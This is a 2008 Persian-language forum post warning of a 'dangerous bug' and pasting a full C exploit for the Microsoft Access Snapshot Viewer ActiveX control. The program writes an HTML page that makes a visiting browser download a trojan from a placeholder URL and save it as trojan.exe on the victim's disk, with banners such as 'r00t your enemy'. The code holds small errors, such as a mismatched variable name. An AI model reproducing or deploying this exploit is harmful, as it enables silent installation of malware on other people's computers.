نمایش پست تنها
قدیمی 2008-07-28, 07:23 PM   #1 (permalink)
Alux
(Alireza HBB)
Registered User
 
Alux آواتار ها
 
تاریخ عضویت: Jan 2006
محل سکونت: Tehran
نوشته ها: 1,524
Groans: 40
Groaned at 17 Times in 11 Posts
Thanks: 349
Thanked 236 Times in 144 Posts
باگ خطرناک در ACCESS

یه باگ خطرناک امروز دیدم واسه اکسل اومده

که با کابر اجازه می ده یه تروجان در سرور آپلود کنه

باگ بصورت ریموت هست

اینم کد



کد:
/* Microsoft Access Snapshot Viewer ActiveX Control Exploit Ms-Access SnapShot Exploit Snapview.ocx v 10.0.5529.0 Download nice binaries into an arbitrary box Vulnerability discovered by Oliver Lavery http://www.securityfocus.com/bid/8536/info Remote: Yes greetz to str0ke */ #include <stdio.h> #include <stdlib.h> #define Filename "Ms-Access-SnapShot.html" FILE *File; char data[] = "<html>\n<objectclassid='clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9'id='attack'></object>\n" "<script language='javascript'>\nvar arbitrary_file = 'http://path_to_trojan'\n" "var dest = 'C:/Docume~1/ALLUSE~1/trojan.exe'\nattack.SnapshotPath = arbitrary_file\n" "attack.CompressedPath = destination\nattack.PrintSnapshot(arbitrary_file,destination)\n" "<script>\n<html>"; int main () { printf("**Microsoft Access Snapshot Viewer ActiveX Exploit**\n"); printf("**c0ded by callAX**\n"); printf("**r00t your enemy .| **"); char *b0fer; if ( (File = fopen(Filename,"w")) == NULL ) { printf("\n fopen() error"); exit(1); } b0fer = (char*)malloc(strlen(data)); fwrite(data, strlen(data), 1,File); fclose(File); printf("\n\n" Filename " has been created.\n"); return 0; }
__________________
Alux @ Dci . IR
A.Habibi@Datak-Telecom.net
Alux آنلاین نیست.   پاسخ با نقل قول
1 سپاس و تایید
ccna (2008-07-29)
تبلیغات

تبلیغات در Persian Networks